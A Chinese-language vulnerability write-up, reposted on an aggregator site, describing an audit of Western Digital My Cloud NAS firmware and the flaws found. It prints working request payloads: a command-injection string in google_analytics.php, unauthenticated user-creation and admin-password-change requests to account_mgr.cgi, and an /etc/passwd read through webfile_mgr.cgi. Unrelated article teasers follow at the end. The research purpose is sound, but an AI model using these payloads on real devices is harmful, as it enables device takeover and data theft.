php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞

2023-10-29 09:40

本文主要是介绍php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

85705

作者:朱老黑

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

传送门

前言

前一段时间在某平台上发现了国外安全团队爆出了西部数据NAS产品的80几个漏洞,但是并没有漏洞的详情,正好我司在用的产品中就有西部数据的NAS,于是就有了这篇文章,这里以此文章为基础,更多的人投入到智能硬件的安全研究中(其实更希望有机会和大牛们一起探讨,带我飞)。

分析

对于智能硬件的安全分析一般从其固件开始入手,获取固件的手段主要有以下几种

1、官网获取

2、智能硬件自带的固件备份功能

3、外部能够利用的漏洞进行远程固件备份下载

4、通过拆解设备,读取flash或者TLL连入设备进行固件提取

一些正规的厂商会把该项产品的所有固件都放到官网上供用户下载,西部数据就是其中之一,可以很轻松的从官网下载到对应设备的固件,这里我们的实验设备是西部数据My_Cloud EX2,实际上也就是西部数据NAS产品的乞丐版。。。通过官网我下载了大部分产品的固件,发现即本一致,所以漏洞基本上是通用的。

85705

85705

得到了设备的固件之后也就完成了安全测试之前的准备工作,下面进行安全测试。

首先对其进行端口扫描,nmap端口扫描结果如下

85705

对以上结果分析之后大致可以分析出以下信息。

1、存在两个三个端口对于HTTP进行相应,分别是80、443、49152

2、存在mysql数据库

3、存在8181未知端口

在硬件安全研究的过程中主要以端口为出发点,现在目标已经出现,下面对固件进行分析并进行解包分析。这里我们是用的是binwalk

使用命令

binwalk My_Cloud_KC2A_2.11.157.bin

85705

比较标准的文件,包含uboot和firmware,直接使用-eM命令进行解包,并得到其固件的系统文件

85705

这里需要注意的是这里从固件中提取出来的文件和设备真正运行时的系统结构存在一定的差异。

85705

在apache配置文件中我们找到了其web对应的路径,将其中的源代码拷贝出来,等待载入源代码审计工具中进行审计。

在进行审计之前先其文件和功能结构进行分析,西部数据的 web端功能由php调用系统实现,大致的结构主要如下

85705

其中80和443端口大家应该都比较熟悉,就是http和https的区别,其对应的web文件都是一样的;49152端口对应的是两个xml文件,能够实现的功能仅仅是获取NAS设备的设备信息;8181端口则对应的是西部数据的restsdk服务,本文暂且不进行讨论。

下面我们主要对80端口的代码进行审计分析。将代码拷贝出来并载入代码分析工具,由于是PHP代码,所以审计起来比较方便,因为审计工具比较多。

下面这张图老司机们基本上一眼就能看出来我用的是什么审计工具。。。

85705

自动审计进行大致分析之后基本上找到了很多的危险函数,在经过仔细的分析之后我们大致找到了以下漏洞。

命令执行

越权

任意文件读取

越权操作

基本上通过这一系列漏洞可以通杀大部分的漏洞设备,下面我们详细分析。

google_analytics.php远程命令执行漏洞

在登录系统之后客户端会不断访问服务端的这一文件,并获取相关信息。在对其进行代码分析后发现其中存在危险函数system(),并在执行时能够载入变量。

85705

85705

最重要的是对传入的参数没有进行过滤导致可以任意执行命令,在进行构造后我们就得到了第一个远程命令执行漏洞。

http://192.168.4.110/web/google_analytics.php

post

cmd=set&opt=pv-home | reboot |&arg=

85705

与之相类似的以下文件同样也存在远程命令执行漏洞。

ftp_download.php远程命令执行

ftp_download.php这个文件时NAS产品中基于FTP产品的应用,在国外大牛对西数NAS产品进行分析时也讲到了此文件的认证绕过,居然直接把认证文件给注释掉了。。。,其中最重要的是这个文件中相对应的功能也存在一个远程命令执行漏洞,这就是无需登录,远程命令执行。下面看仔细分析。

85705

在此文件实现对FTP任务的修改时,调用了system()函数执行系统命令,并且对用户输入的参数没有进行过滤,导致命令注入。

85705

在了解了这一漏洞之后我们进行构造,就得到了我们第二个命令执行漏洞。。。

85705

与之相类似的还有很多,这里并没有进行发掘。下面还有两个与和上面相不同的。

这两个文件是CGI文件,我们并没有对其进行逆向,这里只是简单地对其权限进行简单的探讨。

作为一种非常古老的web程序,被大量应用到物联网设备中,因此有很多的物联网设备的问题就是出在此处,比如很多的远程命令执行漏洞

这一些都是由于对CGI脚本的权限控制不当导致的命令执行,同样的这里西部数据NAS产片同样也存在这样的问题。

account_mgr.cgi越权添加用户(无需登录)

这个脚本是对NAS产品的账号进行控制管理,但是其对用户没有做认证,导致可以在没有登录的情况下进行密码修改,至于这里管理员账号的获取,请尝试安装西部数据的客户端,可以使用抓包软件抓取到其与api接口的请求,可以直接获取到所有的设备账号。

85705

在抓包之后对数据包进行构造,成功添加用户。

85705

85705

相对应的数据包

http://192.168.4.110/cgi-bin/account_mgr.cgi

cmd=cgi_user_add&name=test123&pw=MTExMTEx&group=&first_name=111&last_name=111&pw_onoff=1&mail=111%40qq.com&expires_time=

同样的除了添加用户的功能之外,还能够实现对管理员用户密码的修改

account_mgr.cgi越权修改管理员密码(无需登录)

85705

http://192.168.4.110/cgi-bin/account_mgr.cgi

cmd=cgi_modify_account&mtype=3&username=admin&first_name=111&last_name=111&pw=MTIzMTIz&old_pw=&mail=&group=&available1=0&available2=&available3=&available4=&pw_off=&oldMail=&oldName=test123&type=local&expires_time=&admin

还有一些其他的安全问题

webfile_mgr.cgi任意文件读取导致信息泄露

85705

http://192.168.4.110/cgi-bin/webfile_mgr.cgi

提交参数

cmd=cgi_download&path=%2Fetc%2Fpasswd&path1=%2Fetc%2Fpasswd&name=passwd&type=MD+File&browser=f&os=W

总结

西部数据的这些漏洞还是比较典型的,基本主要成因还是代码的编写过则过于松懈,导致很多的漏洞出现,对于这次的NAS产品系列漏洞的产生实际上危害并没有我们想象的那么大,因为西部数据的NAS产品除了经过特殊设置,大部分只能通过同一网段进行访问,所以这就很大程度上减少了其危害程度,只是对于局域网中,这些漏洞足以致命。

欢迎各位大牛带我飞

传送门

这篇关于php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/299802

相关文章

Ilya-AI分享的他在OpenAI学习到的15个提示工程技巧

Ilya(不是本人,claude AI)在社交媒体上分享了他在OpenAI学习到的15个Prompt撰写技巧。 以下是详细的内容: 提示精确化:在编写提示时,力求表达清晰准确。清楚地阐述任务需求和概念定义至关重要。例:不用"分析文本",而用"判断这段话的情感倾向:积极、消极还是中性"。 快速迭代:善于快速连续调整提示。熟练的提示工程师能够灵活地进行多轮优化。例:从"总结文章"到"用

【专题】2024飞行汽车技术全景报告合集PDF分享(附原数据表)

原文链接: https://tecdat.cn/?p=37628 6月16日,小鹏汇天旅航者X2在北京大兴国际机场临空经济区完成首飞,这也是小鹏汇天的产品在京津冀地区进行的首次飞行。小鹏汇天方面还表示,公司准备量产,并计划今年四季度开启预售小鹏汇天分体式飞行汽车,探索分体式飞行汽车城际通勤。阅读原文,获取专题报告合集全文,解锁文末271份飞行汽车相关行业研究报告。 据悉,业内人士对飞行汽车行业

金融业开源技术 术语

金融业开源技术  术语 1  范围 本文件界定了金融业开源技术的常用术语。 本文件适用于金融业中涉及开源技术的相关标准及规范性文件制定和信息沟通等活动。

AI(文生语音)-TTS 技术线路探索学习:从拼接式参数化方法到Tacotron端到端输出

AI(文生语音)-TTS 技术线路探索学习:从拼接式参数化方法到Tacotron端到端输出 在数字化时代,文本到语音(Text-to-Speech, TTS)技术已成为人机交互的关键桥梁,无论是为视障人士提供辅助阅读,还是为智能助手注入声音的灵魂,TTS 技术都扮演着至关重要的角色。从最初的拼接式方法到参数化技术,再到现今的深度学习解决方案,TTS 技术经历了一段长足的进步。这篇文章将带您穿越时

系统架构设计师: 信息安全技术

简简单单 Online zuozuo: 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo :本心、输入输出、结果 简简单单 Online zuozuo : 文章目录 系统架构设计师: 信息安全技术前言信息安全的基本要素:信息安全的范围:安全措施的目标:访问控制技术要素:访问控制包括:等保

前端技术(七)——less 教程

一、less简介 1. less是什么? less是一种动态样式语言,属于css预处理器的范畴,它扩展了CSS语言,增加了变量、Mixin、函数等特性,使CSS 更易维护和扩展LESS 既可以在 客户端 上运行 ,也可以借助Node.js在服务端运行。 less的中文官网:https://lesscss.cn/ 2. less编译工具 koala 官网 http://koala-app.

动手学深度学习【数据操作+数据预处理】

import osos.makedirs(os.path.join('.', 'data'), exist_ok=True)data_file = os.path.join('.', 'data', 'house_tiny.csv')with open(data_file, 'w') as f:f.write('NumRooms,Alley,Price\n') # 列名f.write('NA

java常用面试题-基础知识分享

什么是Java? Java是一种高级编程语言,旨在提供跨平台的解决方案。它是一种面向对象的语言,具有简单、结构化、可移植、可靠、安全等特点。 Java的主要特点是什么? Java的主要特点包括: 简单性:Java的语法相对简单,易于学习和使用。面向对象:Java是一种完全面向对象的语言,支持封装、继承和多态。跨平台性:Java的程序可以在不同的操作系统上运行,称为"Write once,

Spring的设计⽬标——《Spring技术内幕》

读《Spring技术内幕》第二版,计文柯著。 如果我们要简要地描述Spring的设计⽬标,可以这么说,Spring为开发者提供的是⼀个⼀站式的轻量级应⽤开发框架(平台)。 作为平台,Spring抽象了我们在 许多应⽤开发中遇到的共性问题;同时,作为⼀个轻量级的应⽤开发框架,Spring和传统的J2EE开发相⽐,有其⾃⾝的特点。 通过这些⾃⾝的特点,Spring充分体现了它的设计理念:在

分享5款免费录屏的工具,搞定网课不怕错过!

虽然现在学生们不怎么上网课, 但是对于上班族或者是没有办法到学校参加课程的人来说,网课还是很重要的,今天,我就来跟大家分享一下我用过的几款录屏软件=,看看它们在录制网课时的表现如何。 福昕录屏大师 网址:https://www.foxitsoftware.cn/REC/ 这款软件给我的第一印象就是界面简洁,操作起来很直观。它支持全屏录制,也支持区域录制,这对于我这种需要同时录制PPT和老师讲